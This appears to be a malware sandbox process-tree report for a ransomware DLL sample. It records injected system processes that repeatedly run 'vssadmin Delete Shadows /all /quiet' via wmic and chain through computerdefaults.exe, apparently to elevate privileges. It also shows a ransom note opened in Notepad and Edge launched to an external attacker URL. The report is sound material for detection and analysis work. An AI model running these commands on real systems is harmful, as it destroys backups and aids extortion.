PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
PID:620
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:4828
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3220
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:224
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3052
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Modifies registry class
PID:768
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1400
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4828
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5004
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1460
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2976

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:3120
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:6048
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:6064
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5208
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:6072
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5220

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3384
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\1367b5544d880a04248b3552c3232c3e_JaffaCakes118.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:3016
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3152
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:4440
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:5244
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:928
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5328
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:5960
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:4324
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:6068
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1888
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5244
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Modifies registry class
PID:3564
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:940
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4676
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3004
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:944
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5204

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Modifies registry class
PID:3748
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1316
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:6060
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:684
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3016
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1264

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3840
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:4348
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:2936
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3464

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:3908
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:4372
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3016
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5744
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5704
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:6076

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3996

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:3584
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5292
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5324
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5784
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5328
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5652

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
- Modifies registry class
PID:952
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5628
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5636
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5644

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1980
- C:\Windows\System32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1720
- C:\Windows\System32\cmd.exe
  cmd /c "start http://f6d0ee70e658e6b000qbvpseec.gosmark.space/qbvpseec^&2^&39842057^&79^&321^&2219041"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3656
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://f6d0ee70e658e6b000qbvpseec.gosmark.space/qbvpseec&2&39842057&79&321&2219041
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:1068
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffeaca046f8,0x7ffeaca04708,0x7ffeaca04718
      4⤵
      PID:2444
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,2493030199094657691,5767389610978699294,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
      4⤵
      PID:2832
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,2493030199094657691,5767389610978699294,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4376
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2024,2493030199094657691,5767389610978699294,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
      4⤵
      PID:3964
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2493030199094657691,5767389610978699294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
      4⤵
      PID:4360
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2493030199094657691,5767389610978699294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:1
      4⤵
      PID:3100
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2493030199094657691,5767389610978699294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1
      4⤵
      PID:656
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2493030199094657691,5767389610978699294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
      4⤵
      PID:4808
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,2493030199094657691,5767389610978699294,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5076 /prefetch:8
      4⤵
      PID:2940
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,2493030199094657691,5767389610978699294,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5076 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4536
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2493030199094657691,5767389610978699294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
      4⤵
      PID:1428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2493030199094657691,5767389610978699294,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
      4⤵
      PID:1984
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2493030199094657691,5767389610978699294,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
      4⤵
      PID:5524
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2493030199094657691,5767389610978699294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
      4⤵
      PID:5792
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2493030199094657691,5767389610978699294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2172 /prefetch:1
      4⤵
      PID:3376
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2493030199094657691,5767389610978699294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1752 /prefetch:1
      4⤵
      PID:1360
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,2493030199094657691,5767389610978699294,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1388
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4692
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4336
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3692
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:788
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1132

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:412

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3532
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3824
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1700

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1284
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2080
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4704

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4780

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:232

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4412

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4536

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:724

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5648

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5644
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:684
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5216

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3936

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2744
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:6080
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2404
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5292

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5148
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5976
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6068

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5944
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5200
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2348

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5772

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4244

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6140

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5264
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5324

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5916

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5164
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5208
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1576
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3880

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5920
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5216
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:656
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3992

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2340

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3612

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2996

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5644
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5224
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5344

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:6100
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5236
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5636

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5980
